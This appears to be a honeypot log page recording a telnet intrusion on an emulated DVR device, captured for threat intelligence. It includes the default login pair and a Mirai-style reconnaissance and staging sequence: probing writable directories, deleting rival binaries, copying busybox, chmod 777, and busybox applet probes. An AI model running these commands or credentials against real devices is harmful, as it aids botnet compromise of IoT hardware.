Attack #291998 telnet
Source
146.190.31.68Target port23
Authenticatedyes
Commands18
Duration35.0s
Session recording
Transcript
DVRDVS DVR System Type ? for help dvrdvs> sh dvrdvs> >/tmp/.ptmx && cd /tmp/ dvrdvs> >/var/tmp/.ptmx && cd /var/tmp/ dvrdvs> >/var/run/.ptmx && cd /var/run/ dvrdvs> >/dev/shm/.ptmx && cd /dev/shm/ dvrdvs> >/run/.ptmx && cd /run/ dvrdvs> >/jffs/.ptmx && cd /jffs/ dvrdvs> >/jffs2/.ptmx && cd /jffs2/ dvrdvs> >/mnt/jffs2/.ptmx && cd /mnt/jffs2/ dvrdvs> >/overlay/.ptmx && cd /overlay/ dvrdvs> >/nvram/.ptmx && cd /nvram/ dvrdvs> >/var/.ptmx && cd /var/ dvrdvs> >/mnt/.ptmx && cd /mnt/ dvrdvs> >/mnt/mtd/.ptmx && cd /mnt/mtd/ dvrdvs> /bin/busybox rm -rf dvrHelper tbot dvrdvs> /bin/busybox cp /bin/busybox dvrHelper; >dvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox HolyFuck HolyFuck: applet not found dvrdvs> /bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox cat: /bin/busybox: No such file or directory Unknown command: while Unknown command: do Unknown command: done dvrdvs> /bin/busybox HolyFuck HolyFuck: applet not found dvrdvs>
Credentials
Username: system
Password: shell
Geolocation hub-resolved
🇳🇱The Netherlands · North Holland · Amsterdam
Behavioral classification
🦠
Matched signals:
- chmod/exec chain
- BusyBox probing
Command summary
sh >/tmp/.ptmx && cd /tmp/ >/var/tmp/.ptmx && cd /var/tmp/ >/var/run/.ptmx && cd /var/run/ >/dev/shm/.ptmx && cd /dev/shm/ >/run/.ptmx && cd /run/ >/jffs/.ptmx && cd /jffs/ >/jffs2/.ptmx && cd /jffs2/ >/mnt/jffs2/.ptmx && cd /mnt/jffs2/ >/overlay/.ptmx && cd /overlay/ >/nvram/.ptmx && cd /nvram/ >/var/.ptmx && cd /var/ >/mnt/.ptmx && cd /mnt/ >/mnt/mtd/.ptmx && cd /mnt/mtd/ /bin/busybox rm -rf dvrHelper tbot /bin/busybox cp /bin/busybox dvrHelper; >dvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox HolyFuck /bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox /bin/busybox HolyFuck
Reported to threat intel
HoneyMire Hub · open feed: / · API: /api · docs: /docs · blocklists: /blocklists · about: /about · firmware: github.com/HoneyMire/HoneyMire